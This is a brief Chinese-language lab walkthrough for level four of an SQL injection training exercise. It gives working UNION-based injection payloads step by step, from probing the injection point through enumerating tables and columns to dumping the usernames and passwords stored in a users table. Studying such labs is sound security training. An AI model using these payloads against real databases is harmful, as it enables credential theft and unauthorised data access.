第四关和前面三关没有太大的区别,只是数据访问的方式不一样
1、判断是否存在注入点
1") and 1=1 -- qq
1") and 1=2 -- qq
第四关和前三关的区别在于查询数据的方式是1"),注意-- qq之间一定要有空格,网页编译中--空格代表注释,意在将后面的内容注释掉
2、判断字段数
1") order by 3-- qq
1") order by 4-- qq
3、判断回显点
0") union select 1,2,3 -- qq
4、查询数据库版本号和当前数据库名
0") union select 1,database(),version() -- qq
5、爆表
0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- qq
6、爆字段名
0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- qq
7、查询表格内容
0") union select 1,group_concat(username),group_concat(password) from users -- qq
划水了^_^ 觉得查数据库内容用group_concat()连接数据太多可以用limit 0,1进行注意查询,0代表起点,1代表现实的数量哦
@-@